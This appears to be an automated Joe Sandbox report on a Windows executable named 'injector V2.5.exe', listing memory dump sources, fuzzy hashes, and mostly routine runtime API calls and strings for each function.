                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
                                                                                                                            • Instruction ID: 337ee9a41763cef9e87a3e9ba8ca7bbbbe83c41ac344bc69b86bcb42940e3edd
                                                                                                                            • Opcode Fuzzy Hash: d9fa3b747a8d2419ebfeb7a9e1c2c88648204d5ce45078da1949f3035f47f48a
                                                                                                                            • Instruction Fuzzy Hash: D5C1E636204B208B4A388B2865C963D73D3EBD57357795F96D42BCB3E8DB35CD828642
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
                                                                                                                            • Instruction ID: fda560a9801e254daa3b562d67f5843119d9bf34024343f39c50795176f7af62
                                                                                                                            • Opcode Fuzzy Hash: c294a3fb0ed31826b1d2ed7067dc4f31dcd60eb2a9748b877af8db3fccaabe4d
                                                                                                                            • Instruction Fuzzy Hash: A4A15B372047048BC62C8B2D99E563E77C3EBE2320B65869FC8135BBE0DE755E45A643
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
                                                                                                                            • Instruction ID: 62eac3744f8ceee564bab7d388e29c8ab2510ae8f244ea029fbeb3679a6b8158
                                                                                                                            • Opcode Fuzzy Hash: 6fd248431f2ce0840055f3601d2b5564f56b21af9cd763f98ca1cdd83a024352
                                                                                                                            • Instruction Fuzzy Hash: C2711A3E2153044F4A288A38ADC877EB6D2DFA5324FB987D2D552CB3E5DB21EC458742
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00B2A96A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: A\$A\$A\$U<_k$x"$x"$"!-$"!-
                                                                                                                            • API String ID: 823142352-2094675021
                                                                                                                            • Opcode ID: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
                                                                                                                            • Instruction ID: e3adb2db089bcfdc2e4f8546a815f12d71891e9d36c909b64975bfbaf9529022
                                                                                                                            • Opcode Fuzzy Hash: 049ff094814aca753249a77081175a83616643452ee4579a5cc07c0a60e2bc5d
                                                                                                                            • Instruction Fuzzy Hash: 1251E4322443648BCE2C9A2878E963D62C3ABE6331F3592DBE51F9B6F5CB644C815507
                                                                                                                            APIs
                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00B526E2
                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00B527F0
                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 00B52841
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00B52942
                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00B5295D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 4119006552-393685449
                                                                                                                            • Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                                                            • Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
                                                                                                                            • Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                                                            • Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(033219F8,033219F8,00000000,7FFFFFFF,?,00B53F31,033219F8,033219F8,00000000,033219F8,?,?,?,?,033219F8,00000000), ref: 00B53FEC
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B540A7
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B54136
                                                                                                                            • __freea.LIBCMT ref: 00B54181
                                                                                                                            • __freea.LIBCMT ref: 00B54187
                                                                                                                            • __freea.LIBCMT ref: 00B541BD
                                                                                                                            • __freea.LIBCMT ref: 00B541C3
                                                                                                                            • __freea.LIBCMT ref: 00B541D3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127012223-0
                                                                                                                            • Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                                                            • Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
                                                                                                                            • Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                                                            • Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1
                                                                                                                            APIs
                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00B44997
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                            • String ID: (^Hx$(^Hx$(^Hx
                                                                                                                            • API String ID: 2659868963-1348055467
                                                                                                                            • Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                                                            • Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
                                                                                                                            • Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                                                            • Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742
                                                                                                                            APIs
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00B49E77
                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00B49E7F
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00B49F08
                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00B49F33
                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00B49F88
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                            • Opcode ID: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                                                            • Instruction ID: c778cff382c8a130e6a90332a1503ec3ce4e834225436c6d2fe64578e38955a9
                                                                                                                            • Opcode Fuzzy Hash: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                                                            • Instruction Fuzzy Hash: 0041A334A002199BCF10DF68D881A9FBBE5EF45324F1481D5E8189B392E731EF19DB91
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,0B27884D,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                            • Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                                                            • Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
                                                                                                                            • Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                                                            • Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
                                                                                                                            • SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0
                                                                                                                            • Opcode ID: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
                                                                                                                            • Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
                                                                                                                            • Opcode Fuzzy Hash: 07b574f77fe556f80a5baffd7ea9088b712c2522c6bfe9513aeb4b0484c9e705
                                                                                                                            • Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\Desktop\injector V2.5.exe, xrefs: 00B4FAD0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: C:\Users\user\Desktop\injector V2.5.exe
                                                                                                                            • API String ID: 0-3924246060
                                                                                                                            • Opcode ID: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                                                            • Instruction ID: be1db36567d3007cda6b4feda3c6a409c000ac073bafaa49c81cf6002918b56e
                                                                                                                            • Opcode Fuzzy Hash: 9b523ce69885e20e55402e50f1e1b981a05652e91e36661555709c9526c99c54
                                                                                                                            • Instruction Fuzzy Hash: D5216A71600217AF9F20AFB5CCA1D7BB7E9EF0136471185B5F86997251DB30EE00ABA1
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0B27884D,?,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A95A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4A96C
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00B563AE,000000FF,?,00B4A9E6,?,?,00B4AA82,788496A7), ref: 00B4A98E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                                                            • Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
                                                                                                                            • Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                                                            • Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90
                                                                                                                            APIs
                                                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 00B52AF3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CatchEncodePointer
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 1435073870-2084237596
                                                                                                                            • Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                                                            • Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
                                                                                                                            • Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                                                            • Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(788496A7,00000000,00000800,?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068), ref: 00B50C2F
                                                                                                                            • GetLastError.KERNEL32(?,00B50CBE,?,?,?,?,?,?,00B50B06,00000000,FlsAlloc,00B58060,00B58068,?,?,00B4C0EC), ref: 00B50C39
                                                                                                                            • LoadLibraryExW.KERNEL32(788496A7,00000000,00000000,?,788496A7,?,?,?,?,00B4BD8C,?,?,00B33046,?,00000000,788496A7), ref: 00B50C61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                            • Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                                                            • Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
                                                                                                                            • Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                                                            • Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584
                                                                                                                            APIs
                                                                                                                            • GetConsoleOutputCP.KERNEL32(0B27884D,00000000,00000000,?), ref: 00B515E2
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
                                                                                                                            • GetLastError.KERNEL32 ref: 00B5191D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112829910-0
                                                                                                                            • Opcode ID: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                                                            • Instruction ID: d76d7660a7a8e0b50ab572c5f483a359158408b4c544443337649b5db093b239
                                                                                                                            • Opcode Fuzzy Hash: de704682eceb4e38c3b5f09b3cb75fcadd36038b260da3f42776c48b5b55cb81
                                                                                                                            • Instruction Fuzzy Hash: D7D16BB5D002489FDB15CFA8D880BEDBBF5EF09311F2849AAE865EB251D730A945CB50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
